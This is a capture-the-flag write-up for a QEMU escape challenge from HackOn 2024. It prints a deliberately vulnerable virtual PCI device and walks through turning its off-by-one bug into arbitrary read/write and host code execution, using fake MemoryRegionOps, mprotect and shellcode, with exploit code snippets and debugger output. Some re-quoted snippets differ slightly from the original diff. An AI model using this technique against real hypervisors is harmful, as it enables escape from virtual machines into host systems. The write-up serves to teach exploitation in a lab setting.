ZEROCLICK

Quememu Writeup HackOn 2024 CTF

April 14, 2024
15 min read
Table of Contents

Intro

Challenge Preview

We created a few challenges for the HackOn CTF. One of them was a Qemu Escape challenge. To obtain the flag, the user must escape Qemu and read the flag that’s located in the host.

In this post, we are going to explain in depth how to solve the challenge. You can download the challenge here.

Understanding the provided info

In this challenge, we can see a few files:

~/Downloads/quememu » tree
.
├── Dockerfile
├── deploy_docker.sh
├── diff.txt
├── docker-compose.yml
├── flag
├── initramfs.cpio.gz
├── pc-bios
    ...
├── qemu-system-x86_64
├── run.sh
├── vmlinuz-5.15.0-92-generic
└── xinetd

The file diff.txt sounds interesting. Let’s see its content:

commit 40192e9557fccd3982e17d533fae9f1b0103624d
Author: Pwnkebab <pwnkebab@gmail.com>
Date:   Tue Feb 6 16:13:11 2024 +0000
 
    QueMemu device
 
diff --git a/hw/misc/meson.build b/hw/misc/meson.build
index e4ef1da5a5..022755ced9 100644
--- a/hw/misc/meson.build
+++ b/hw/misc/meson.build
@@ -153,6 +153,8 @@ specific_ss.add(when: 'CONFIG_MIPS_CPS', if_true: files('mips_cmgcr.c', 'mips_cp
 specific_ss.add(when: 'CONFIG_MIPS_ITU', if_true: files('mips_itu.c'))
 
 system_ss.add(when: 'CONFIG_SBSA_REF', if_true: files('sbsa_ec.c'))
+system_ss.add(files('quememu.c'))
+
 
 # HPPA devices
 system_ss.add(when: 'CONFIG_LASI', if_true: files('lasi.c'))
diff --git a/hw/misc/quememu.c b/hw/misc/quememu.c
new file mode 100644
index 0000000000..c4c0b2ca77
--- /dev/null
+++ b/hw/misc/quememu.c
@@ -0,0 +1,176 @@
+#include "qemu/osdep.h"
+#include "qemu/units.h"
+#include "hw/pci/pci.h"
+#include "hw/hw.h"
+#include "hw/pci/msi.h"
+#include "qemu/timer.h"
+#include "qom/object.h"
+#include "qemu/module.h"
+#include "qapi/visitor.h"
+#include <math.h>
+
+#define TYPE_PCI_QUEMEMU_DEVICE "quememu"
+#define QUEMEMU_MMIO_SIZE 0x10000
+#define BUFF_SIZE 0x10000
+#define MAX_BASE 20
+#define MAX_RW BUFF_SIZE - (pow(MAX_BASE,3)*0x7 + pow(MAX_BASE,2)*0xF + MAX_BASE*0xF + 0xF - 1)
+
+typedef unsigned char base_t;
+
+typedef struct{
+    PCIDevice pdev;
+    MemoryRegion mmio;
+    char buff[BUFF_SIZE];
+    struct {
+        base_t base;
+        short off;
+		hwaddr src;
+	} state;
+} QueMemuState;
+
+DECLARE_INSTANCE_CHECKER(QueMemuState, QUEMEMU, TYPE_PCI_QUEMEMU_DEVICE)
+
+static unsigned char consume_nibble(unsigned short *n)
+{
+	unsigned char nibble = *n<<4;
+	nibble = nibble>>4;
+	*n = *n>>4;
+
+	return nibble;
+}
+
+static void trigger_rw(QueMemuState *quememu, bool is_write)
+{
+    if (quememu->state.base == 0)
+        return;
+
+    if (quememu->state.base == 0x10) // Don't change base cause we already use base 16
+    {
+        cpu_physical_memory_rw(quememu->state.src, &quememu->buff[quememu->state.off], MAX_RW, is_write);
+        return;
+    }
+
+    unsigned short n = quememu->state.off;
+	unsigned long long multiplier = 1, new_off = 0;
+
+	for (int i = 0; i < sizeof(n)*2; ++i)
+	{
+        // Use nibble % base (e.g. 7 in base 3 = 1)
+        new_off += (consume_nibble(&n) % quememu->state.base) * multiplier;
+		multiplier *= quememu->state.base;
+	}
+    cpu_physical_memory_rw(quememu->state.src, &quememu->buff[new_off], MAX_RW, is_write);
+}
+
+static uint64_t quememu_mmio_read(void *opaque, hwaddr addr, unsigned size) {
+    QueMemuState *quememu = (QueMemuState *)opaque;
+    uint64_t val = 0;
+    switch (addr)
+    {
+        case 0x00:
+            trigger_rw(quememu, 1);
+            break;
+        case 0x04:
+            val = quememu->state.base;
+            break;
+        case 0x08:
+            val = quememu->state.off;
+            break;
+        case 0x0c:
+            val = quememu->state.src;
+            break;
+        default:
+            val = 0xFABADA;
+            break;
+    }
+    return val;
+}
+
+static void quememu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
+    QueMemuState *quememu = (QueMemuState *)opaque;
+    switch (addr)
+    {
+        case 0x00:
+            trigger_rw(quememu, 0);
+            break;
+        case 0x04:
+            if ((base_t) val <= MAX_BASE) quememu->state.base = val;
+            break;
+        case 0x08:
+            if ((short) val >= 0) quememu->state.off = val;
+            break;
+        case 0x0c:
+            quememu->state.src = val;
+            break;
+        default:
+            break;
+    }
+}
+
+static const MemoryRegionOps quememu_mmio_ops =
+{
+    .read = quememu_mmio_read,
+    .write = quememu_mmio_write,
+    .endianness = DEVICE_NATIVE_ENDIAN,
+    .valid =
+    {
+        .min_access_size = 4,
+        .max_access_size = 4,
+    },
+    .impl =
+    {
+        .min_access_size = 4,
+        .max_access_size = 4,
+    },
+};
+
+static void pci_quememu_realize(PCIDevice *pdev, Error **errp)
+{
+    QueMemuState *quememu = QUEMEMU(pdev);
+    memory_region_init_io(&quememu->mmio, OBJECT(quememu), &quememu_mmio_ops, quememu, "quememu-mmio", QUEMEMU_MMIO_SIZE);
+    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &quememu->mmio);
+}
+
+static void quememu_instance_init(Object *obj)
+{
+    QueMemuState *quememu = QUEMEMU(obj);
+    memset(&quememu->state, 0, sizeof(quememu->state));
+    memset(quememu->buff, 0, sizeof(quememu->buff));
+}
+
+static void quememu_class_init(ObjectClass *class, void *data)
+{
+    DeviceClass *dc = DEVICE_CLASS(class);
+    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
+    k->realize = pci_quememu_realize;
+    k->vendor_id = PCI_VENDOR_ID_QEMU;
+    k->device_id = 0xFACE;
+    k->revision = 0x0;
+    k->class_id = PCI_CLASS_OTHERS;
+
+    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
+}
+
+static void pci_quememu_register_types(void)
+{
+    static InterfaceInfo interfaces[] =
+    {
+        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
+        { },
+    };
+    static const TypeInfo quememu_info =
+    {
+        .name = TYPE_PCI_QUEMEMU_DEVICE,
+        .parent = TYPE_PCI_DEVICE,
+        .instance_size = sizeof(QueMemuState),
+        .instance_init = quememu_instance_init,
+        .class_init = quememu_class_init,
+        .interfaces = interfaces,
+    };
+
+    type_register_static(&quememu_info);
+}
+
+type_init(pci_quememu_register_types)

As you can see, a new device has been added in hw/misc/quememu.c. The provided qemu-system-x86_64 binary has also been compiled with this device included (see the meson.build change).

Analyzing the device

In the pci_quememu_register_types function, the device is registered:

static void pci_quememu_register_types(void)
{
    static InterfaceInfo interfaces[] =
    {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo quememu_info =
    {
        .name = TYPE_PCI_quememu_DEVICE,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(quememuState),
        .instance_init = quememu_instance_init,
        .class_init = quememu_class_init,
        .interfaces = interfaces,
    };
 
    type_register_static(&quememu_info);
}
 
type_init(pci_quememu_register_types)

The quememu_class_init function defines some characteristics of the device, such as the device ID (0xFACE), which will be useful later to identify the device:

static void quememu_class_init(ObjectClass *class, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
    k->realize = pci_quememu_realize;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0xFACE;
    k->revision = 0x0;
    k->class_id = PCI_CLASS_OTHERS;
 
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

Also, in the pci_quememu_realize function we can see that an MMIO region is registered. This region is going to allow us to do I/O operations between the virtual machine and the device:

static void pci_quememu_realize(PCIDevice *pdev, Error **errp)
{
    QueMemuState *quememu = QUEMEMU(pdev);
    memory_region_init_io(&quememu->mmio, OBJECT(quememu), &quememu_mmio_ops, quememu, "quememu-mmio", QUEMEMU_MMIO_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &quememu->mmio);
}

When memory_region_init_io is called, the quememu_mmio_ops structure is passed as an argument.

This structure defines the callbacks. Each time the guest reads from or writes to the MMIO region, the corresponding callback is executed:

static const MemoryRegionOps quememu_mmio_ops =
{
    .read = quememu_mmio_read,
    .write = quememu_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid =
    {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl =
    {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

The function associated with the read is quememu_mmio_read:

static uint64_t quememu_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    QueMemuState *quememu = (QueMemuState *)opaque;
    uint64_t val = 0;
    switch (addr)
    {
        case 0x00:
            trigger_rw(1);
            break;
        case 0x04:
            val = quememu->state.base;
            break;
        case 0x08:
            val = quememu->state.off;
            break;
        case 0x0c:
            val = quememu->state.src;
            break;
        default:
            val = 0xFABADA;
            break;
    }
    return val;
}

And the function associated with the write is quememu_mmio_write:

static void quememu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    QueMemuState *quememu = (QueMemuState *)opaque;
    switch (addr)
    {
        case 0x00:
            trigger_rw(0);
            break;
        case 0x04:
            if ((base_t) val <= MAX_BASE) quememu->state.base = val;
            break;
        case 0x08:
            if ((short) val >= 0) quememu->state.off = val;
            break;
        case 0x0c:
            quememu->state.src = val;
            break;
        default:
            break;
    }
}

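As you can see, by writing to this region we can set the base, the offset, and the source of the state structure. Also, in both functions, accessing address 0x00 calls trigger_rw. Note the direction of the copy: an MMIO read at 0x00 calls trigger_rw with is_write = 1, so cpu_physical_memory_rw copies data from the device buffer into guest memory at src, while an MMIO write at 0x00 passes is_write = 0 and copies guest memory at src into the device buffer.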

static void trigger_rw(bool is_write)
{
    if (quememu->state.base = 0x10) // Don't change base cause we already use base 16
    {
        cpu_physical_memory_rw(quememu->state.src, &quememu->buff[&quememu->state.off], MAX_RW, is_write);
        return;
    }
 
    short n = quememu->state.off;
	unsigned long long multiplier = 1, new_off = 0;
 
	for (int i = 0; i < sizeof(n)*2; ++i)
	{
        // Use nibble % base (e.g. 7 in base 3 = 1)
        new_off += (consume_nibble(&n) % quememu->state.base) * multiplier;
		multiplier *= quememu->state.base;
	}
    cpu_physical_memory_rw(quememu->state.src, &quememu->buff[new_off], MAX_RW, is_write);
}

This function may seem a bit confusing at first glance. Let’s analyze it in detail.

First of all, we must understand how the QueMemuState structure is defined:

typedef unsigned char base_t;
 
typedef struct{
    PCIDevice pdev;
    MemoryRegion mmio;
    char buff[BUFF_SIZE];
    struct {
        base_t base;
        short off;
		hwaddr src;
	} state;
} QueMemuState;

It contains a struct (state) that has a base (unsigned char), offset (short), and src (hwaddr). In addition, there is a mmio variable of type MemoryRegion. If we look at the documentation, we see that:

Memory is modelled as an acyclic graph of MemoryRegion objects. Sinks (leaves) are RAM and MMIO regions, while other nodes represent buses, memory controllers, and memory regions that have been rerouted. There are multiple types of memory regions (all represented by a single C type MemoryRegion)…

So, it is an abstraction that represents the different memory areas inside the virtual machine. If we combine it with what we have seen in the pci_quememu_realize function and with the following point of the documentation we can understand it a little better:

MMIO: a range of guest memory that is implemented by host callbacks; each read or write causes a callback to be called on the host. You initialize these with memory_region_init_io, passing it a MemoryRegionOps structure describing the callbacks.

Going back to the trigger_rw function: if the base is 0x10, nothing special happens and cpu_physical_memory_rw is simply called with state.off as the index. Otherwise, new_off is calculated first. For example, if the base is 20 and the offset is 0x1234, the algorithm does the following:

new_off = 0x4 * (20 ** 0)
new_off += 0x3 * (20 ** 1)
new_off += 0x2 * (20 ** 2)
new_off += 0x1 * (20 ** 3)

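So, new_off = 0x22a0. To sum up, each hexadecimal digit (nibble) of the offset is treated as a digit in the base we have provided (reduced modulo that base), and the resulting number is used as the index into buff. Let’s check it: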

Convert Base

Identifying the vulnerabilities

Now that we understand how the device works, we can start identifying the vulnerabilities.

In the trigger_rw function, the len used in cpu_physical_memory_rw is MAX_RW which is defined as follows:

#define BUFF_SIZE 0x10000
#define MAX_BASE 20
#define MAX_RW BUFF_SIZE - (pow(MAX_BASE,3)*0x7 + pow(MAX_BASE,2)*0xF + MAX_BASE*0xF + 0xF - 1)

So, MAX_RW = 0x10000 - 62314 = 3222

We know that buff has a size of 0x10000 and that the largest offset we can set is 0x7fff, because state.off is a short and negative values are rejected. Moreover, the largest allowed base is 20. In this case, the value of new_off is 62315:

new_off = 0xf * (20 ** 0)
new_off += 0xf * (20 ** 1)
new_off += 0xf * (20 ** 2)
new_off += 0x7 * (20 ** 3)

So, we have an off by one!!

The cpu_physical_memory_rw function will read or write 3222 bytes starting at quememu->buff[62315], which means that we access the range [62315, 0x10001), i.e. one byte past the end of buff (the byte at index 0x10000).

The next question is, what can we modify with this off by one?

If you take a look at the QueMemuState structure, the base attribute comes right after the buff variable. Since the base <= MAX_BASE check is only done in the quememu_mmio_write function (address 0x04), we can use the off by one to set an arbitrary base and get a bigger overflow.

Now, for example, we can modify the offset. Nevertheless, what’s our plan?

If we were able to modify the offset to a negative value, we could read or write to the MemoryRegion.

gef➤  ptype /ox MemoryRegion
type = struct MemoryRegion {
/* 0x0000      |  0x0028 */    Object parent_obj;
/* 0x0028      |  0x0001 */    _Bool romd_mode;
/* 0x0029      |  0x0001 */    _Bool ram;
/* 0x002a      |  0x0001 */    _Bool subpage;
/* 0x002b      |  0x0001 */    _Bool readonly;
/* 0x002c      |  0x0001 */    _Bool nonvolatile;
/* 0x002d      |  0x0001 */    _Bool rom_device;
/* 0x002e      |  0x0001 */    _Bool flush_coalesced_mmio;
/* 0x002f      |  0x0001 */    _Bool unmergeable;
/* 0x0030      |  0x0001 */    uint8_t dirty_log_mask;
/* 0x0031      |  0x0001 */    _Bool is_iommu;
/* XXX  6-byte hole      */
/* 0x0038      |  0x0008 */    RAMBlock *ram_block;
/* 0x0040      |  0x0008 */    Object *owner;
/* 0x0048      |  0x0008 */    DeviceState *dev;
/* 0x0050      |  0x0008 */    const MemoryRegionOps *ops;
/* 0x0058      |  0x0008 */    void *opaque;
/* 0x0060      |  0x0008 */    MemoryRegion *container;
/* 0x0068      |  0x0004 */    int mapped_via_alias;
...
/* total size (bytes):  272 */
}

The MemoryRegionOps seems familiar to you, right?

If not, review the quememu_mmio_ops.

The structure of MemoryRegionOps is as follows:

gef➤  ptype /ox MemoryRegionOps
type = struct MemoryRegionOps {
/* 0x0000      |  0x0008 */    uint64_t (*read)(void *, hwaddr, unsigned int);
/* 0x0008      |  0x0008 */    void (*write)(void *, hwaddr, uint64_t, unsigned int);
/* 0x0010      |  0x0008 */    MemTxResult (*read_with_attrs)(void *, hwaddr, uint64_t *, unsigned int, MemTxAttrs);
/* 0x0018      |  0x0008 */    MemTxResult (*write_with_attrs)(void *, hwaddr, uint64_t, unsigned int, MemTxAttrs);
/* 0x0020      |  0x0004 */    enum device_endian endianness;
/* XXX  4-byte hole      */
/* 0x0028      |  0x0018 */    struct {
/* 0x0028      |  0x0004 */        unsigned int min_access_size;
/* 0x002c      |  0x0004 */        unsigned int max_access_size;
/* 0x0030      |  0x0001 */        _Bool unaligned;
/* XXX  7-byte hole      */
/* 0x0038      |  0x0008 */        _Bool (*accepts)(void *, hwaddr, unsigned int, _Bool, MemTxAttrs);
 
                                   /* total size (bytes):   24 */
                               } valid;
/* 0x0040      |  0x000c */    struct {
/* 0x0040      |  0x0004 */        unsigned int min_access_size;
/* 0x0044      |  0x0004 */        unsigned int max_access_size;
/* 0x0048      |  0x0001 */        _Bool unaligned;
/* XXX  3-byte padding   */
 
                                   /* total size (bytes):   12 */
                               } impl;
/* XXX  4-byte padding   */
 
                               /* total size (bytes):   80 */
}

Great, so if we can read and write to MemoryRegionOps we can modify the callbacks and escape.

In the trigger_rw function, new_off is unsigned, so we can’t achieve our goal directly. However, if the base is 0x10 there is no base conversion, so the index is quememu->state.off itself, which is a signed short: a negative value indexes memory before buff. Now we have everything we need to get arbitrary read/write:

  1. Trigger the off by one and modify the base to have a bigger overflow.
  2. Modify the offset to point anywhere we want (in this case to the MemoryRegion structure).
  3. Set the base to 0x10 to skip the unsigned base conversion, so that a negative offset is used as-is.

In our case, if we set the base to 21 (MAX_BASE+1), we have to set the offset to at least 0x6f6b. To calculate that number, we first computed the starting index needed for the transfer to reach index 0x10004 from the start of the buffer, and then expressed it in base 21. The reason why we have to reach at least 0x10004 and not 0x10003 is that there is 1 byte of padding between the base attribute and the off attribute:

gef➤  ptype/xo QueMemuState*
type = struct {
/* 0x0000      |  0x0a30 */    PCIDevice pdev;
/* 0x0a30      |  0x0110 */    MemoryRegion mmio;
/* 0x0b40      | 0x10000 */    char buff[65536];
/* 0x10b40     |  0x0010 */    struct {
/* 0x10b40     |  0x0001 */        base_t base;
/* XXX  1-byte hole      */
/* 0x10b42     |  0x0002 */        short off;
/* XXX  4-byte hole      */
/* 0x10b48     |  0x0008 */        hwaddr src;
 
                                   /* total size (bytes):   16 */
                               } state;
                               /* total size (bytes): 68432 */
} *

So, knowing that we want to reach 0x10004 and that the amount written is 3222 bytes (as shown previously), the starting index we need is 0x10004-3222 = 0xf36e, which in base 21 is written 0x6f6b:

def hex2base(n, base):
    new_off = ""
    while n > 0:
        tmp = n % base
        new_off += f"{tmp:x}"
        n //= base
    return "0x" + new_off[::-1]
 
if __name__ == "__main__":
    print(hex2base(0xf36e, 21))
$ python3 base_converter.py
0x6f6b

Exploitation strategy

Now that we know how to escalate the off by one bug and end up reading or writing to the mmio (MemoryRegion) attribute, we have to use that to read the flag. As we said earlier, our strategy consists of achieving code execution by replacing the read and write callbacks with anything we want. In this case, we will overwrite the write callback to call mprotect and the read callback to point to a controlled buffer (the buff attribute), where we will place our final shellcode, which just opens the flag, reads it, and writes it to stdout. However, we have to solve another problem: we cannot directly control the first argument passed to mprotect, because the callback’s first argument is always void *opaque.

Before any of that, we obviously need to leak some addresses. In this case, we only need to know the address of mprotect (or mprotect@plt) and the address of the buffer. We can get the address of mprotect@plt just by leaking any PIE address and adding/subtracting offsets; here we will use the const MemoryRegionOps *ops attribute which, as we can see, is a PIE address:

gef➤  p quememu->mmio
$2 = {
  parent_obj = {
    class = 0x555556e83490,
    free = 0x0,
    properties = 0x555557d03b60Python Exception <class 'gdb.error'>: There is no member named keys.
,
    ref = 0x1,
    parent = 0x555557d91230
  },
  romd_mode = 0x1,
  ram = 0x0,
  subpage = 0x0,
  readonly = 0x0,
  nonvolatile = 0x0,
  rom_device = 0x0,
  flush_coalesced_mmio = 0x0,
  unmergeable = 0x0,
  dirty_log_mask = 0x0,
  is_iommu = 0x0,
  ram_block = 0x0,
  owner = 0x555557d91230,
  dev = 0x555557d91230,
  ops = 0x555556a4b460 <quememu_mmio_ops>,
  opaque = 0x555557d91230,
  container = 0x555556f1e6e0,
  mapped_via_alias = 0x0,
...
}
gef➤  vmmap 0x555556a4b460
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x000055555622e000 0x0000555556c05000 0x0000000000cd9000 r-- ./qemu-system-x86_64

The address of the buffer can be calculated from the address of the whole QueMemuState structure, which we can obtain from the owner attribute.

For the final part of the exploit, we have to set up a fake MemoryRegionOps structure and overwrite the ops attribute of the MemoryRegion to point to it:

void setup_fake_ops(char *hva_mprotect_plt, char *hva_qmemu_buff)
{
	*(void **)(gva_buff + MREG_SIZE) = hva_qmemu_buff+0x60; // fake read
	*(void **)(gva_buff + MREG_SIZE + 0x8) = hva_mprotect_plt; // fake write
	memcpy(gva_buff + MREG_SIZE+0x60, shellcode, SHELLCODE_SIZE);
}
 
void overwrite_ops(char *hva_mprotect_plt, char *hva_qmemu_buff)
{
	setup_fake_ops(hva_mprotect_plt, hva_qmemu_buff);
	*(void **)(gva_buff + MREG_OPS_OFF) = hva_qmemu_buff;
	*(void **)(gva_buff + MREG_OPAQUE_OFF) = (void *)(((uint64_t)hva_qmemu_buff+0x60)/0x1000*0x1000);
	mmio_write(trigger, 0);
}

In our exploit, the setup_fake_ops function creates the fake structure at gva_buff[MREG_SIZE]. Remember that everything we have in our guest buffer will be copied (once the write callback is triggered) to the place where the MemoryRegion mmio is located, so by writing our fake ops at an offset of MREG_SIZE from gva_buff, they will end up at the start of the quememu buff. We have done this to ensure that we don’t overwrite anything useful in mmio. Our fake ops first contain a pointer to hva_qmemu_buff+0x60 (which is where we place our shellcode) and then a pointer to mprotect@plt. These two pointers mock the read and write callbacks, respectively. Finally, we copy our shellcode to gva_buff[MREG_SIZE+0x60] which, remember, will end up at buff[0x60] in the quememu structure.

Having set up the fake ops, we can now overwrite the pointer to the MemoryRegionOps with hva_qmemu_buff which, as we explained earlier, is where our fake ops will end up. To be able to pass the correct first argument to mprotect, we also have to overwrite the opaque attribute with a pointer to the page where our shellcode will end up.

Once we trigger the write, we will have the following layout:

Memory Layout

Lastly, we call mprotect and our shellcode, and we get the flag:

...
	// call mprotect
	mmio_write(0x1000,  PROT_READ | PROT_WRITE | PROT_EXEC);
	// win :)
	puts("[*] PWNED!");
	mmio_read(trigger);
...

Executing the exploit

You can find the complete exploit at this link.

If we run the exploit, we can successfully read the flag that is located outside Qemu:

Result flag